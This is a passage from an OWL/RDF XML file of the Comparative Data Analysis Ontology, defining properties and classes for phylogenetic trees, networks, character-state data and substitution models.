<rdf:Description rdf:about="&obo;CDAO_0000015"/>
<rdf:Description rdf:about="&obo;CDAO_0000055"/>
</owl:unionOf>
</owl:Class>
</rdfs:range>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000190 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000190">
<rdfs:label rdf:datatype="&xsd;string">belongs_to</rdfs:label>
<dc:description>Generic property that links a concept to another concept it is a constituent of. The property is a synonym of part_of.</dc:description>
<owl:equivalentProperty rdf:resource="&obo;CDAO_0000194"/>
<rdfs:range rdf:resource="&owl;Thing"/>
<rdfs:domain rdf:resource="&owl;Thing"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000191 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000191">
<rdf:type rdf:resource="&owl;FunctionalProperty"/>
<rdfs:label rdf:datatype="&xsd;string">belongs_to_TU</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property relates a character-state datum to its TU.</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000098"/>
<rdfs:range rdf:resource="&obo;CDAO_0000138"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000190"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000192 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000192">
<rdfs:label rdf:datatype="&xsd;string">belongs_to_Network</rdfs:label>
<rdfs:range rdf:resource="&obo;CDAO_0000006"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000190"/>
<rdfs:domain>
<owl:Class>
<owl:unionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000099"/>
<rdf:Description rdf:about="&obo;CDAO_0000140"/>
</owl:unionOf>
</owl:Class>
</rdfs:domain>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000193 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000193">
<rdfs:label rdf:datatype="&xsd;string">has_Annotation</rdfs:label>
<rdfs:range rdf:resource="&obo;CDAO_0000040"/>
<owl:inverseOf rdf:resource="&obo;CDAO_0000157"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000178"/>
<rdfs:domain rdf:resource="&owl;Thing"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000194 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000194">
<rdfs:label rdf:datatype="&xsd;string">part_of</rdfs:label>
<owl:inverseOf rdf:resource="&obo;CDAO_0000178"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000195 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000195">
<rdfs:label rdf:datatype="&xsd;string">has_Nucleotide_Datum</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property relates a nucleotide character (a column in a nucleotide alignment) to a state datum for the character (an individual cell in the alignment column).</dc:description>
<rdfs:range rdf:resource="&obo;CDAO_0000002"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000206"/>
<rdfs:domain>
<owl:Class>
<owl:unionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000094"/>
<rdf:Description rdf:about="&obo;CDAO_0000138"/>
</owl:unionOf>
</owl:Class>
</rdfs:domain>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000196 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000196">
<rdfs:label rdf:datatype="&xsd;string">represented_by_Node</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property relates a TU to a node that represents it in a network.</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000138"/>
<rdfs:range rdf:resource="&obo;CDAO_0000140"/>
<owl:inverseOf rdf:resource="&obo;CDAO_0000187"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000197 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000197">
<rdfs:label rdf:datatype="&xsd;string">has_Remaining_Coordinate_List</rdfs:label>
<dc:description rdf:datatype="&xsd;string">The property that relates a coordinate list to the item in the list beyond the first item.</dc:description>
<rdfs:range rdf:resource="&obo;CDAO_0000092"/>
<rdfs:domain rdf:resource="&obo;CDAO_0000092"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000178"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000198 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000198">
<rdfs:label rdf:datatype="&xsd;string">has_Element</rdfs:label>
<rdfs:domain rdf:resource="&obo;CDAO_0000118"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000178"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000199 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000199">
<rdfs:label rdf:datatype="&xsd;string">exclude_Subtree</rdfs:label>
<rdfs:range rdf:resource="&obo;CDAO_0000070"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000161"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000200 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000200">
<rdfs:label rdf:datatype="&xsd;string">belongs_to_Tree</rdfs:label>
<rdfs:range rdf:resource="&obo;CDAO_0000110"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000190"/>
<rdfs:domain>
<owl:Class>
<owl:unionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000099"/>
<rdf:Description rdf:about="&obo;CDAO_0000140"/>
</owl:unionOf>
</owl:Class>
</rdfs:domain>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000201 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000201">
<rdf:type rdf:resource="&owl;FunctionalProperty"/>
<rdfs:label rdf:datatype="&xsd;string">has_Parent_Node</rdfs:label>
<dc:description>Associates to a Directed Edge the Node that is in the parent position in the edge (i.e., the node touched by the edge and closer to the root of the tree)</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000139"/>
<rdfs:range rdf:resource="&obo;CDAO_0000140"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000162"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000202 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000202">
<rdfs:label rdf:datatype="&xsd;string">has_Lineage_node</rdfs:label>
<rdfs:domain rdf:resource="&obo;CDAO_0000004"/>
<rdfs:range rdf:resource="&obo;CDAO_0000140"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000178"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000203 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000203">
<rdfs:label rdf:datatype="&xsd;string">belongs_to_Tree_as_Root</rdfs:label>
<rdfs:range rdf:resource="&obo;CDAO_0000110"/>
<rdfs:domain rdf:resource="&obo;CDAO_0000140"/>
<owl:inverseOf rdf:resource="&obo;CDAO_0000148"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000190"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000204 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000204">
<rdfs:label rdf:datatype="&xsd;string">has_Hereditary_Change</rdfs:label>
<rdfs:range rdf:resource="&obo;CDAO_0000097"/>
<rdfs:domain rdf:resource="&obo;CDAO_0000099"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000178"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000205 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000205">
<rdf:type rdf:resource="&owl;FunctionalProperty"/>
<rdfs:label rdf:datatype="&xsd;string">belongs_to_Character</rdfs:label>
<rdfs:range rdf:resource="&obo;CDAO_0000071"/>
<rdfs:domain rdf:resource="&obo;CDAO_0000098"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000190"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000206 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000206">
<rdfs:label rdf:datatype="&xsd;string">has_Molecular_Datum</rdfs:label>
<rdfs:range rdf:resource="&obo;CDAO_0000050"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000183"/>
<rdfs:domain>
<owl:Class>
<owl:unionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000115"/>
<rdf:Description rdf:about="&obo;CDAO_0000138"/>
</owl:unionOf>
</owl:Class>
</rdfs:domain>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000207 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000207">
<rdfs:label rdf:datatype="&xsd;string">has_Continuous_Datum</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property relates a continuous character to a state datum for the character.</dc:description>
<rdfs:range rdf:resource="&obo;CDAO_0000019"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000153"/>
<rdfs:domain>
<owl:Class>
<owl:unionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000068"/>
<rdf:Description rdf:about="&obo;CDAO_0000138"/>
</owl:unionOf>
</owl:Class>
</rdfs:domain>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000208 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000208">
<rdfs:label rdf:datatype="&xsd;string">has_TU</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property associates a character data matrix with a TU (a row) represented in the matrix.</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000056"/>
<rdfs:range rdf:resource="&obo;CDAO_0000138"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000178"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000209 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000209">
<rdf:type rdf:resource="&owl;FunctionalProperty"/>
<rdfs:label rdf:datatype="&xsd;string">has_Child_Node</rdfs:label>
<dc:description>The property associates to a Directed Edge the Node that is in the child position in the edge, i.e., the node touched by the edge and closer to the leaves of the tree.</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000139"/>
<rdfs:range rdf:resource="&obo;CDAO_0000140"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000162"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000210 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000210">
<rdfs:label rdf:datatype="&xsd;string">has_Right_Node</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property relates a transformation to a 'right' node (the node that has the 'right' state).</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000097"/>
<rdfs:range rdf:resource="&obo;CDAO_0000140"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000182"/>
</owl:ObjectProperty>
<!--
///////////////////////////////////////////////////////////////////////////////////////
//
// Data properties
//
///////////////////////////////////////////////////////////////////////////////////////
-->
<!-- http://purl.obolibrary.org/obo/CDAO_0000211 -->
<owl:DatatypeProperty rdf:about="&obo;CDAO_0000211">
<rdfs:label rdf:datatype="&xsd;string">has_Precision</rdfs:label>
<rdfs:range rdf:resource="&xsd;float"/>
</owl:DatatypeProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000212 -->
<owl:DatatypeProperty rdf:about="&obo;CDAO_0000212">
<rdfs:label rdf:datatype="&xsd;string">has_Point_Coordinate_Value</rdfs:label>
<rdfs:domain rdf:resource="&obo;CDAO_0000003"/>
<rdfs:range rdf:resource="&xsd;integer"/>
</owl:DatatypeProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000213 -->
<owl:DatatypeProperty rdf:about="&obo;CDAO_0000213">
<rdfs:label rdf:datatype="&xsd;string">has_Int_Value</rdfs:label>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000215"/>
<rdfs:range rdf:resource="&xsd;int"/>
</owl:DatatypeProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000214 -->
<owl:DatatypeProperty rdf:about="&obo;CDAO_0000214">
<rdfs:label rdf:datatype="&xsd;string">has_Support_Value</rdfs:label>
<rdfs:range rdf:resource="&xsd;float"/>
</owl:DatatypeProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000215 -->
<owl:DatatypeProperty rdf:about="&obo;CDAO_0000215">
<rdfs:label rdf:datatype="&xsd;string">has_Value</rdfs:label>
</owl:DatatypeProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000216 -->
<owl:DatatypeProperty rdf:about="&obo;CDAO_0000216">
<rdfs:label rdf:datatype="&xsd;string">has_Uncertainty_Factor</rdfs:label>
<rdfs:range rdf:resource="&xsd;float"/>
</owl:DatatypeProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000217 -->
<owl:DatatypeProperty rdf:about="&obo;CDAO_0000217">
<rdfs:label rdf:datatype="&xsd;string">has_Range_End_Value</rdfs:label>
<rdfs:domain rdf:resource="&obo;CDAO_0000095"/>
<rdfs:range rdf:resource="&xsd;integer"/>
</owl:DatatypeProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000218 -->
<owl:DatatypeProperty rdf:about="&obo;CDAO_0000218">
<rdfs:label rdf:datatype="&xsd;string">has_Float_Value</rdfs:label>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000215"/>
<rdfs:range rdf:resource="&xsd;float"/>
</owl:DatatypeProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000219 -->
<owl:DatatypeProperty rdf:about="&obo;CDAO_0000219">
<rdfs:label rdf:datatype="&xsd;string">has_Range_Start_Value</rdfs:label>
<rdfs:domain rdf:resource="&obo;CDAO_0000095"/>
<rdfs:range rdf:resource="&xsd;integer"/>
</owl:DatatypeProperty>
<!--
///////////////////////////////////////////////////////////////////////////////////////
//
// Classes
//
///////////////////////////////////////////////////////////////////////////////////////
-->
<!-- http://purl.obolibrary.org/obo/CDAO_0000002 -->
<owl:Class rdf:about="&obo;CDAO_0000002">
<rdfs:label rdf:datatype="&xsd;string">DesoxiRibonucleotideResidueStateDatum</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000050"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000003 -->
<owl:Class rdf:about="&obo;CDAO_0000003">
<rdfs:label rdf:datatype="&xsd;string">CoordinatePoint</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000022"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000004 -->
<owl:Class rdf:about="&obo;CDAO_0000004">
<rdfs:label rdf:datatype="&xsd;string">Lineage</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000012"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000202"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000140"/>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000005 -->
<owl:Class rdf:about="&obo;CDAO_0000005">
<rdfs:label rdf:datatype="&xsd;string">Phylo4Tree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000074"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000006 -->
<owl:Class rdf:about="&obo;CDAO_0000006">
<rdfs:label rdf:datatype="&xsd;string">Network</rdfs:label>
<rdfs:subClassOf rdf:resource="&owl;Thing"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000178"/>
<owl:allValuesFrom>
<owl:Class>
<owl:unionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000099"/>
<rdf:Description rdf:about="&obo;CDAO_0000140"/>
</owl:unionOf>
</owl:Class>
</owl:allValuesFrom>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000007 -->
<owl:Class rdf:about="&obo;CDAO_0000007">
<rdfs:label rdf:datatype="&xsd;string">ModelDescription</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000040"/>
<dc:description>Description of a model of transformations.</dc:description>
<rdfs:comment>This is a non-computible description of a model, not the fully specified mathematical model, which typically relates the probability of a transformation to various parameters.</rdfs:comment>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000008 -->
<owl:Class rdf:about="&obo;CDAO_0000008">
<rdfs:label rdf:datatype="&xsd;string">StandardStateDatum</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000089"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000009 -->
<owl:Class rdf:about="&obo;CDAO_0000009">
<rdfs:label rdf:datatype="&xsd;string">ContinuousCharacterLengthType</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000063"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000010 -->
<owl:Class rdf:about="&obo;CDAO_0000010">
<rdfs:label rdf:datatype="&xsd;string">ContinuousCharBayesianLengthType</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000009"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000011 -->
<owl:Class rdf:about="&obo;CDAO_0000011">
<rdfs:label rdf:datatype="&xsd;string">NEXUSTreeBlock</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000074"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000012 -->
<owl:Class rdf:about="&obo;CDAO_0000012">
<rdfs:label rdf:datatype="&xsd;string">RootedTree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000110"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000155"/>
<owl:allValuesFrom rdf:resource="&obo;CDAO_0000012"/>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000148"/>
<owl:onClass rdf:resource="&obo;CDAO_0000140"/>
<owl:qualifiedCardinality rdf:datatype="&xsd;nonNegativeInteger">1</owl:qualifiedCardinality>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000178"/>
<owl:allValuesFrom>
<owl:Class>
<owl:unionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000139"/>
<rdf:Description rdf:about="&obo;CDAO_0000140"/>
</owl:unionOf>
</owl:Class>
</owl:allValuesFrom>
</owl:Restriction>
</rdfs:subClassOf>
<owl:disjointWith rdf:resource="&obo;CDAO_0000088"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000013 -->
<owl:Class rdf:about="&obo;CDAO_0000013">
<rdfs:label rdf:datatype="&xsd;string">Kimura2Parameters</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000020"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000014 -->
<owl:Class rdf:about="&obo;CDAO_0000014">
<rdfs:label rdf:datatype="&xsd;string">TreeProcedure</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000044"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000015 -->
<owl:Class rdf:about="&obo;CDAO_0000015">
<rdfs:label rdf:datatype="&xsd;string">Generic_State</rdfs:label>
<owl:equivalentClass>
<owl:Class>
<owl:oneOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000222"/>
<rdf:Description rdf:about="&obo;CDAO_0000221"/>
<rdf:Description rdf:about="&obo;CDAO_0000223"/>
</owl:oneOf>
</owl:Class>
</owl:equivalentClass>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000039"/>
<rdfs:comment>This class should be renamed. These are not generic states but non-concrete states including gap, unknown and missing.</rdfs:comment>
<dc:description>This concept is tied to the verbally ambiguous 'gap' concept and to the use of a gap character (often the en dash '-') in text representations of sequence alignments. In general, this represents the absence of any positively diagnosed Character-State. As such, the gap may be interpreted as an additional Character-State, as the absence of the Character, or as an unknown value. In some cases it is helpful to separate these.</dc:description>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000016 -->
<owl:Class rdf:about="&obo;CDAO_0000016">
<rdfs:label rdf:datatype="&xsd;string">UnrootedSubtree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000070"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000017 -->
<owl:Class rdf:about="&obo;CDAO_0000017">
<rdfs:label rdf:datatype="&xsd;string">UnresolvedTree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000110"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000018 -->
<owl:Class rdf:about="&obo;CDAO_0000018">
<rdfs:label rdf:datatype="&xsd;string">BifurcatingTree</rdfs:label>
<owl:equivalentClass rdf:resource="&obo;CDAO_0000130"/>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000110"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000019 -->
<owl:Class rdf:about="&obo;CDAO_0000019">
<rdfs:label rdf:datatype="&xsd;string">ContinuousStateDatum</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000098"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000020 -->
<owl:Class rdf:about="&obo;CDAO_0000020">
<rdfs:label rdf:datatype="&xsd;string">SubstitutionModel</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000007"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000021 -->
<owl:Class rdf:about="&obo;CDAO_0000021">
<rdfs:label rdf:datatype="&xsd;string">JukesKantor</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000020"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000022 -->
<owl:Class rdf:about="&obo;CDAO_0000022">
<rdfs:label rdf:datatype="&xsd;string">DatumCoordinate</rdfs:label>
<rdfs:subClassOf rdf:resource="&owl;Thing"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000165"/>
<owl:onClass rdf:resource="&obo;CDAO_0000104"/>
<owl:qualifiedCardinality rdf:datatype="&xsd;nonNegativeInteger">1</owl:qualifiedCardinality>
</owl:Restriction>
</rdfs:subClassOf>
<dc:description>A positional coordinate giving the source of a character state, used for molecular sequences.</dc:description>
<rdfs:comment>drawing from seqloc categories from NCBI at http://www.ncbi.nlm.nih.gov/IEB/ToolBox/SDKDOCS/SEQLOC.HTML#_Seq-loc:_Locations_on</rdfs:comment>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000023 -->
<owl:Class rdf:about="&obo;CDAO_0000023">
<rdfs:label rdf:datatype="&xsd;string">UnresolvedRootedTree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000012"/>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000017"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000024 -->
<owl:Class rdf:about="&obo;CDAO_0000024">
<rdfs:label rdf:datatype="&xsd;string">Branch</rdfs:label>
<owl:equivalentClass rdf:resource="&obo;CDAO_0000099"/>
<dc:description>'Branch' is the domain-specific synonym for an edge of a (Phylogenetic) Tree or Network. Branches may have properties such as length and degree of support.</dc:description>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000025 -->
<owl:Class rdf:about="&obo;CDAO_0000025">
<rdfs:label rdf:datatype="&xsd;string">CharacterStateDataMatrixAnnotation</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000040"/>
<dc:description>Meta-information associated with a character matrix, such as, for the case of a sequence alignment, the method of alignment.</dc:description>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000026 -->
<owl:Class rdf:about="&obo;CDAO_0000026">
<rdfs:label rdf:datatype="&xsd;string">AncestralNode</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000140"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000174"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000140"/>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000194"/>
<owl:onClass rdf:resource="&obo;CDAO_0000012"/>
<owl:minQualifiedCardinality rdf:datatype="&xsd;nonNegativeInteger">1</owl:minQualifiedCardinality>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000027 -->
<owl:Class rdf:about="&obo;CDAO_0000027">
<rdfs:label rdf:datatype="&xsd;string">UnresolvedUnrootedTree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000017"/>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000088"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000029 -->
<owl:Class rdf:about="&obo;CDAO_0000029">
<rdfs:label rdf:datatype="&xsd;string">UncertainStateDomain</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000091"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000216"/>
<owl:someValuesFrom rdf:resource="&xsd;float"/>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000030 -->
<owl:Class rdf:about="&obo;CDAO_0000030">
<rdfs:label rdf:datatype="&xsd;string">ReconcileTree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000110"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000172"/>
<owl:onClass rdf:resource="&obo;CDAO_0000110"/>
<owl:minQualifiedCardinality rdf:datatype="&xsd;nonNegativeInteger">2</owl:minQualifiedCardinality>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000031 -->
<owl:Class rdf:about="&obo;CDAO_0000031">
<rdfs:label rdf:datatype="&xsd;string">Continuous</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000091"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000215"/>
<owl:cardinality rdf:datatype="&xsd;nonNegativeInteger">1</owl:cardinality>
</owl:Restriction>
</rdfs:subClassOf>
<dc:description>This class describes a continuous value. The link to the actual float value is through the property has_Value. It could have also other properties attached (e.g., has_Precision).</dc:description>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000032 -->
<owl:Class rdf:about="&obo;CDAO_0000032">
<rdfs:label rdf:datatype="&xsd;string">AlignmentProcedure</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000025"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000033 -->
<owl:Class rdf:about="&obo;CDAO_0000033">
<rdfs:label rdf:datatype="&xsd;string">Dichotomy</rdfs:label>
<owl:equivalentClass rdf:resource="&obo;CDAO_0000124"/>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000026"/>
<owl:disjointWith rdf:resource="&obo;CDAO_0000042"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000034 -->
<owl:Class rdf:about="&obo;CDAO_0000034">
<rdfs:label rdf:datatype="&xsd;string">Molecular</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000039"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000035 -->
<owl:Class rdf:about="&obo;CDAO_0000035">
<rdfs:label rdf:datatype="&xsd;string">ContinuousCharParsimonyLengthType</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000009"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000039 -->
<owl:Class rdf:about="&obo;CDAO_0000039">
<rdfs:label rdf:datatype="&xsd;string">Categorical</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000091"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000040 -->
<owl:Class rdf:about="&obo;CDAO_0000040">
<rdfs:label rdf:datatype="&xsd;string">CDAOAnnotation</rdfs:label>
<rdfs:subClassOf rdf:resource="&owl;Thing"/>
<rdfs:comment>Its possible that this base class should be discarded and that annotations should inherit from an imported base class if one exists.</rdfs:comment>
<dc:description>The base class of annotations in CDAO.</dc:description>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000041 -->
<owl:Class rdf:about="&obo;CDAO_0000041">
<rdfs:label rdf:datatype="&xsd;string">originationEvent</rdfs:label>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000190"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000097"/>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000042 -->
<owl:Class rdf:about="&obo;CDAO_0000042">
<rdfs:label rdf:datatype="&xsd;string">Polytomy</rdfs:label>
<owl:equivalentClass>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000177"/>
